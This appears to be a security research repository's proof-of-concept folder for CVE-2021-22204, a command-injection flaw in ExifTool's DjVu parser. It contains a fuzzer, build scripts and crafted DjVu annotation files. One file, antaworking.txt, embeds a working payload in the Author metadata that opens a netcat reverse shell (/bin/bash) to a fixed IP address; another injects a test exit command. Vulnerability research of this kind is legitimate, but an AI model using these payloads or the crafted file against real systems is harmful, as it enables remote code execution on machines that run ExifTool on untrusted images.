STRLCPY/STARLabs_CVE-PoCs

■ ■ ■ ■ ■ ■

CVE-2021-22204/README.md

1	+	# CVE 2021-22204
2	+	This folder contains :
3	+	- `payloads` folder containing payloads that triggers a crash
4	+	- mutateList to see the different payloads attempted during the fuzzing
5	+	- `poc.sh` to show an example of a crash in the fuzzer
6	+	- `run.sh` to run djvumake file against `test.script` which is also used by the fuzzer
7	+	- `test.script` is the content that we want to add in the ANTa section
8	+	- `sample.script` is used by the fuzzer as a template to generate `test.script`
9	+	- `anta.txt` and `antaworking.txt` can be used by editing `run.sh`
10	+	- `sample2.djvu` is the POC djvu file generated by the fuzzer.
11	+	- `fuzz.py` is the fuzzer used for this research
12	+	- Note that you would require djvumake. This was tested in Kali machine.
13	+	- REMEMBER TO EDIT THE `DjVu.pm` FILE IN `lib/Image/ExifTool/` directory as shown
14	+
15	+	![fuzzer-detection.png](img/fuzzer-detection.png)
16	+
17	+
18	+
19	+	# Demo
20	+
21	+	![cve-2021-22204-POC.gif](./cve-2021-22204-POC.gif)
22	+
23	+

■ ■ ■ ■ ■ ■

CVE-2021-22204/anta.txt

1	+	select; remove-ant; remove-txt
2	+	# -------------------------
3	+	select 1
4	+	set-ant
5	+	(metadata
6	+	(Author "\
7	+	";`exit 1337 `")
8	+	(Title "DjVu Metadata Sample")
9	+	(Subject "ExifTool DjVu test image")
10	+	(CreationDate "2008-09-23T12:31:34-04:00")
11	+	(ModDate "2008-11-11T09:17:10-05:00")
12	+	(Keywords "ExifTool, Test, DjVu, XMP")
13	+	(Producer "djvused")
14	+	(Trapped "Unknown")
15	+	(Creator "ExifTool")
16	+	(note "Must escape double quotes (\") and backslashes (\\)") )
17	+	(url "https://exiftool.org/")
18	+	(rce "Can I have RCE")
19	+	(xmp "<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>\n\n
20	+	<rdf:Description rdf:about=''\n xmlns:album=\"http://ns.adobe.com/album/1.0/\">\n
21	+	<album:Notes>Must escape double quotes (") and backslashes (\\)</album:Notes>\n
22	+	</rdf:Description>\n\n <rdf:Description rdf:about=''\n xmlns:dc='http://purl.org/dc/elements/1.1/'>\n
23	+	<dc:creator>\n
24	+	<rdf:Seq>\n
25	+	<rdf:li>Phil Harvey</rdf:li>\n
26	+	</rdf:Seq>\n
27	+	</dc:creator>\n
28	+	<dc:description>\n
29	+	<rdf:Alt>\n
30	+	<rdf:li xml:lang='x-default'>ExifTool DjVu test image</rdf:li>\n
31	+	</rdf:Alt>\n
32	+	</dc:description>\n
33	+	<dc:rights>\n
34	+	<rdf:Alt>\n
35	+	<rdf:li xml:lang='x-default'>Copyright 2008 Phil Harvey</rdf:li>\n
36	+	</rdf:Alt>\n
37	+	</dc:rights>\n
38	+	<dc:subject>\n
39	+	<rdf:Bag>\n
40	+	<rdf:li>ExifTool</rdf:li>\n
41	+	<rdf:li>Test</rdf:li>\n
42	+	<rdf:li>DjVu</rdf:li>\n
43	+	<rdf:li>XMP</rdf:li>\n
44	+	</rdf:Bag>\n
45	+	</dc:subject>\n
46	+	<dc:title>\n
47	+	<rdf:Alt>\n
48	+	<rdf:li xml:lang='x-default'>DjVu Metadata Sample</rdf:li>\n
49	+	</rdf:Alt>\n
50	+	</dc:title>\n
51	+	</rdf:Description>\n\n
52	+	<rdf:Description rdf:about=''\n xmlns:pdf='http://ns.adobe.com/pdf/1.3/'>\n
53	+	<pdf:Keywords>ExifTool, Test, DjVu, XMP</pdf:Keywords>\n
54	+	<pdf:Producer>djvused</pdf:Producer>\n
55	+	<pdf:Trapped>/Unknown</pdf:Trapped>\n
56	+	</rdf:Description>\n\n
57	+	<rdf:Description rdf:about=''\n xmlns:xmp='http://ns.adobe.com/xap/1.0/'>\n
58	+	<xmp:CreateDate>2008-09-23T12:31:34-04:00</xmp:CreateDate>\n
59	+	<xmp:CreatorTool>ExifTool</xmp:CreatorTool>\n
60	+	<xmp:ModifyDate>2008-11-11T09:17:10-05:00</xmp:ModifyDate>\n
61	+	</rdf:Description>\n</rdf:RDF>")
62	+	.
63	+

■ ■ ■ ■ ■ ■

CVE-2021-22204/antaworking.txt

1	+	select; remove-ant; remove-txt
2	+	# -------------------------
3	+	select 1
4	+	set-ant
5	+	(metadata
6	+	(Author "\
7	+	";`nc 192.168.159.128 8080 -e /bin/bash`;#")
8	+	(Title "DjVu Metadata Sample")
9	+	(Subject "ExifTool DjVu test image")
10	+	(CreationDate "2008-09-23T12:31:34-04:00")
11	+	(ModDate "2008-11-11T09:17:10-05:00")
12	+	(Keywords "ExifTool, Test, DjVu, XMP")
13	+	(Producer "djvused")
14	+	(Trapped "Unknown")
15	+	(Creator "ExifTool")
16	+	(note "Must escape double quotes (\") and backslashes (\\)") )
17	+	(url "https://exiftool.org/")
18	+	(rce "Can I have RCE")
19	+	(xmp "<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>\n\n
20	+	<rdf:Description rdf:about=''\n xmlns:album=\"http://ns.adobe.com/album/1.0/\">\n
21	+	<album:Notes>Must escape double quotes (") and backslashes (\\)</album:Notes>\n
22	+	</rdf:Description>\n\n <rdf:Description rdf:about=''\n xmlns:dc='http://purl.org/dc/elements/1.1/'>\n
23	+	<dc:creator>\n
24	+	<rdf:Seq>\n
25	+	<rdf:li>Phil Harvey</rdf:li>\n
26	+	</rdf:Seq>\n
27	+	</dc:creator>\n
28	+	<dc:description>\n
29	+	<rdf:Alt>\n
30	+	<rdf:li xml:lang='x-default'>ExifTool DjVu test image</rdf:li>\n
31	+	</rdf:Alt>\n
32	+	</dc:description>\n
33	+	<dc:rights>\n
34	+	<rdf:Alt>\n
35	+	<rdf:li xml:lang='x-default'>Copyright 2008 Phil Harvey</rdf:li>\n
36	+	</rdf:Alt>\n
37	+	</dc:rights>\n
38	+	<dc:subject>\n
39	+	<rdf:Bag>\n
40	+	<rdf:li>ExifTool</rdf:li>\n
41	+	<rdf:li>Test</rdf:li>\n
42	+	<rdf:li>DjVu</rdf:li>\n
43	+	<rdf:li>XMP</rdf:li>\n
44	+	</rdf:Bag>\n
45	+	</dc:subject>\n
46	+	<dc:title>\n
47	+	<rdf:Alt>\n
48	+	<rdf:li xml:lang='x-default'>DjVu Metadata Sample</rdf:li>\n
49	+	</rdf:Alt>\n
50	+	</dc:title>\n
51	+	</rdf:Description>\n\n
52	+	<rdf:Description rdf:about=''\n xmlns:pdf='http://ns.adobe.com/pdf/1.3/'>\n
53	+	<pdf:Keywords>ExifTool, Test, DjVu, XMP</pdf:Keywords>\n
54	+	<pdf:Producer>djvused</pdf:Producer>\n
55	+	<pdf:Trapped>/Unknown</pdf:Trapped>\n
56	+	</rdf:Description>\n\n
57	+	<rdf:Description rdf:about=''\n xmlns:xmp='http://ns.adobe.com/xap/1.0/'>\n
58	+	<xmp:CreateDate>2008-09-23T12:31:34-04:00</xmp:CreateDate>\n
59	+	<xmp:CreatorTool>ExifTool</xmp:CreatorTool>\n
60	+	<xmp:ModifyDate>2008-11-11T09:17:10-05:00</xmp:ModifyDate>\n
61	+	</rdf:Description>\n</rdf:RDF>")
62	+	.
63	+

CVE-2021-22204/cve-2021-22204-POC.gif

■ ■ ■ ■ ■ ■

CVE-2021-22204/fuzz.py

1	+
2	+	import random
3	+	import os.path
4	+	import os
5	+	import math
6	+	import subprocess
7	+	import time
8	+
9	+	"""
10	+	# must protect unescaped "$" and "@" symbols, and "\" at end of string
11	+	$tok =~ s{\\(.)\|([\$\@]\|\\$)}{'\\'.($2 \|\| $1)}sge;
12	+	# convert C escape sequences (allowed in quoted text)
13	+	$tok = eval qq{"$tok"};
14	+	# convert C escape sequences, allowed in quoted text
15	+	# (note: this only converts a few of them!)
16	+	my %esc = ( a => "\a", b => "\b", f => "\f", n => "\n",
17	+	r => "\r", t => "\t", '"' => '"', '\\' => '\\' );
18	+	$tok =~ s/\\(.)/$esc{$1}\|\|'\\'.$1/egs;
19	+	"""
20	+	specialChars = ["\"","\"","\\"," ","\r","\n","\b","\a","\f","\t"," "," ","\\"]
21	+	specialChars+= ["\\\""]
22	+	specialChars += ["\\\\"]
23	+	specialChars += ["\\\\\\"]
24	+
25	+	#specialChars+=[",\\n"]*10
26	+	dicts = specialChars #+ [chr(i) for i in range(256)]
27	+	#dicts += [('\\%03o' % i) for i in range(256)]
28	+
29	+	payload = ""
30	+	mutatefile = open("./mutateList","wb")
31	+	payloadfilename = "./payloads/payload"+str(random.randint(0,9999))+".bin"
32	+	crashingpayloadfile = open(payloadfilename,"wb")
33	+
34	+
35	+	def mutateCommand(cmd):
36	+	for i in range(random.randint(1,6)):
37	+	cmd = bytes(random.choice(dicts), 'utf-8') + cmd
38	+	#for i in range(random.randint(1,6)):
39	+	# cmd += bytes(random.choice(dicts), 'utf-8')
40	+
41	+	print ("Mutated to : " + str(cmd))
42	+	cmd = cmd.replace(b"\r\n",b"\n")
43	+
44	+	mutatefile.write(cmd)
45	+	return cmd
46	+
47	+	def main():
48	+	starttime = time.perf_counter()
49	+	#os.system("C:\\Windows\\System32\\cmd.exe")
50	+	while True:
51	+	#if os.path.isfile("./pwned.txt"):
52	+	# break
53	+
54	+
55	+	# main goal is to try to get the file to be output into /tmp/XXXXX
56	+	# try to look for the file locating at that directory
57	+
58	+	# in the patch, they put an enumation and when is hit one of these characters,
59	+	# it would replace them with something else which is really interesting
60	+
61	+	#testscript = open("F:\\CVE-2021-22204\\CreatePayload\\fuzz\\test"+str(random.randint(0,9999))+".script","wb")
62	+	testscript = open("./test.script","wb")
63	+
64	+	samplescript = open("./sample.script","rb")
65	+	mainCommand = b"XXXX"
66	+
67	+	data = samplescript.read().replace(b"\r\n",b"\n");
68	+	payload = mutateCommand(b";`" + mainCommand + b"`;" )
69	+
70	+	while 1:
71	+	if data.find(b'##MARKER##') != -1:
72	+	data = data.replace(b'##MARKER##', mutateCommand(b" "+payload), 1)
73	+	else:
74	+	break
75	+	#print (data)
76	+	testscript.write(data)
77	+	testscript.close()
78	+
79	+	"""if b'\\\n"' in payload:
80	+	return
81	+	"""
82	+	samplescript.close()
83	+	print("Re-generating test.script file")
84	+
85	+	#os.system("pause")
86	+	#subprocess.run(["..\\DjVuLibre\\Djvused.exe","./sample2.djvu","-f","./test.script","-s"])
87	+	r = subprocess.run("./run.sh")
88	+
89	+	print ("Return Code : " + str(r.returncode))
90	+	if r.returncode == 37:
91	+	crashingpayloadfile.write(payload)
92	+	print ("Elapsed Time : " + str(time.perf_counter() - starttime) + " seconds ")
93	+	break
94	+	print ("Elapsed Time : " + str(time.perf_counter() - starttime) + " seconds ")
95	+	print("PAYLOAD")
96	+	os.system("hexdump -c payloads/"+ payloadfilename)
97	+
98	+
99	+
100	+
101	+	main()
102	+	crashingpayloadfile.close()
103	+	print("Payload found and saved to " + payloadfilename)
104	+

CVE-2021-22204/img/fuzzer-detection.png

■ ■ ■ ■ ■ ■

CVE-2021-22204/poc.sh

1	+	#! /bin/bash
2	+
3	+	djvumake ./sample2.djvu INFO=0,0 BGjp=testing.jpg ANTa=anta.txt
4	+	../../exiftool sample2.djvu
5	+

■ ■ ■ ■ ■ ■

CVE-2021-22204/run.sh

1	+	#! /bin/bash
2	+
3	+	djvumake ./sample2.djvu INFO=0,0 BGjp=testing.jpg ANTa=test.script
4	+	../../exiftool sample2.djvu
5	+

■ ■ ■ ■ ■ ■

CVE-2021-22204/sample.script

1	+	select; remove-ant; remove-txt
2	+	# -------------------------
3	+	select 1
4	+	set-ant
5	+	(metadata
6	+	(Author "##MARKER##" )
7	+	(Title "DjVu Metadata Sample")
8	+	(Subject "ExifTool DjVu test image")
9	+	(CreationDate "2008-09-23T12:31:34-04:00")
10	+	(ModDate "2008-11-11T09:17:10-05:00")
11	+	(Keywords "ExifTool, Test, DjVu, XMP")
12	+	(Producer "djvused")
13	+	(Trapped "Unknown")
14	+	(Creator "ExifTool")
15	+	(note "Must escape double quotes (\") and backslashes (\\)") )
16	+	(url "https://exiftool.org/")
17	+	(xmp "<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>\n\n
18	+	<rdf:Description rdf:about=''\n xmlns:album=\"http://ns.adobe.com/album/1.0/\">\n
19	+	<album:Notes>Must escape double quotes (") and backslashes (\\)</album:Notes>\n
20	+	</rdf:Description>\n\n <rdf:Description rdf:about=''\n xmlns:dc='http://purl.org/dc/elements/1.1/'>\n
21	+	<dc:creator>\n
22	+	<rdf:Seq>\n
23	+	<rdf:li>Phil Harvey</rdf:li>\n
24	+	</rdf:Seq>\n
25	+	</dc:creator>\n
26	+	<dc:description>\n
27	+	<rdf:Alt>\n
28	+	<rdf:li xml:lang='x-default'>ExifTool DjVu test image</rdf:li>\n
29	+	</rdf:Alt>\n
30	+	</dc:description>\n
31	+	<dc:rights>\n
32	+	<rdf:Alt>\n
33	+	<rdf:li xml:lang='x-default'>Copyright 2008 Phil Harvey</rdf:li>\n
34	+	</rdf:Alt>\n
35	+	</dc:rights>\n
36	+	<dc:subject>\n
37	+	<rdf:Bag>\n
38	+	<rdf:li>ExifTool</rdf:li>\n
39	+	<rdf:li>Test</rdf:li>\n
40	+	<rdf:li>DjVu</rdf:li>\n
41	+	<rdf:li>XMP</rdf:li>\n
42	+	</rdf:Bag>\n
43	+	</dc:subject>\n
44	+	<dc:title>\n
45	+	<rdf:Alt>\n
46	+	<rdf:li xml:lang='x-default'>DjVu Metadata Sample</rdf:li>\n
47	+	</rdf:Alt>\n
48	+	</dc:title>\n
49	+	</rdf:Description>\n\n
50	+	<rdf:Description rdf:about=''\n xmlns:pdf='http://ns.adobe.com/pdf/1.3/'>\n
51	+	<pdf:Keywords>ExifTool, Test, DjVu, XMP</pdf:Keywords>\n
52	+	<pdf:Producer>djvused</pdf:Producer>\n
53	+	<pdf:Trapped>/Unknown</pdf:Trapped>\n
54	+	</rdf:Description>\n\n
55	+	<rdf:Description rdf:about=''\n xmlns:xmp='http://ns.adobe.com/xap/1.0/'>\n
56	+	<xmp:CreateDate>2008-09-23T12:31:34-04:00</xmp:CreateDate>\n
57	+	<xmp:CreatorTool>ExifTool</xmp:CreatorTool>\n
58	+	<xmp:ModifyDate>2008-11-11T09:17:10-05:00</xmp:ModifyDate>\n
59	+	</rdf:Description>\n</rdf:RDF>")
60	+	.

CVE-2021-22204/sample2.djvu

■ ■ ■ ■ ■ ■

CVE-2021-22204/test.script

1	+	select; remove-ant; remove-txt
2	+	# -------------------------
3	+	select 1
4	+	set-ant
5	+	(metadata
6	+	(Author " \\ \\
7	+	";`XXXX`;" )
8	+	(Title "DjVu Metadata Sample")
9	+	(Subject "ExifTool DjVu test image")
10	+	(CreationDate "2008-09-23T12:31:34-04:00")
11	+	(ModDate "2008-11-11T09:17:10-05:00")
12	+	(Keywords "ExifTool, Test, DjVu, XMP")
13	+	(Producer "djvused")
14	+	(Trapped "Unknown")
15	+	(Creator "ExifTool")
16	+	(note "Must escape double quotes (\") and backslashes (\\)") )
17	+	(url "https://exiftool.org/")
18	+	(xmp "<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>\n\n
19	+	<rdf:Description rdf:about=''\n xmlns:album=\"http://ns.adobe.com/album/1.0/\">\n
20	+	<album:Notes>Must escape double quotes (") and backslashes (\\)</album:Notes>\n
21	+	</rdf:Description>\n\n <rdf:Description rdf:about=''\n xmlns:dc='http://purl.org/dc/elements/1.1/'>\n
22	+	<dc:creator>\n
23	+	<rdf:Seq>\n
24	+	<rdf:li>Phil Harvey</rdf:li>\n
25	+	</rdf:Seq>\n
26	+	</dc:creator>\n
27	+	<dc:description>\n
28	+	<rdf:Alt>\n
29	+	<rdf:li xml:lang='x-default'>ExifTool DjVu test image</rdf:li>\n
30	+	</rdf:Alt>\n
31	+	</dc:description>\n
32	+	<dc:rights>\n
33	+	<rdf:Alt>\n
34	+	<rdf:li xml:lang='x-default'>Copyright 2008 Phil Harvey</rdf:li>\n
35	+	</rdf:Alt>\n
36	+	</dc:rights>\n
37	+	<dc:subject>\n
38	+	<rdf:Bag>\n
39	+	<rdf:li>ExifTool</rdf:li>\n
40	+	<rdf:li>Test</rdf:li>\n
41	+	<rdf:li>DjVu</rdf:li>\n
42	+	<rdf:li>XMP</rdf:li>\n
43	+	</rdf:Bag>\n
44	+	</dc:subject>\n
45	+	<dc:title>\n
46	+	<rdf:Alt>\n
47	+	<rdf:li xml:lang='x-default'>DjVu Metadata Sample</rdf:li>\n
48	+	</rdf:Alt>\n
49	+	</dc:title>\n
50	+	</rdf:Description>\n\n
51	+	<rdf:Description rdf:about=''\n xmlns:pdf='http://ns.adobe.com/pdf/1.3/'>\n
52	+	<pdf:Keywords>ExifTool, Test, DjVu, XMP</pdf:Keywords>\n
53	+	<pdf:Producer>djvused</pdf:Producer>\n
54	+	<pdf:Trapped>/Unknown</pdf:Trapped>\n
55	+	</rdf:Description>\n\n
56	+	<rdf:Description rdf:about=''\n xmlns:xmp='http://ns.adobe.com/xap/1.0/'>\n
57	+	<xmp:CreateDate>2008-09-23T12:31:34-04:00</xmp:CreateDate>\n
58	+	<xmp:CreatorTool>ExifTool</xmp:CreatorTool>\n
59	+	<xmp:ModifyDate>2008-11-11T09:17:10-05:00</xmp:ModifyDate>\n
60	+	</rdf:Description>\n</rdf:RDF>")
61	+	.

CVE-2021-22204/testing.jpg

Add files via upload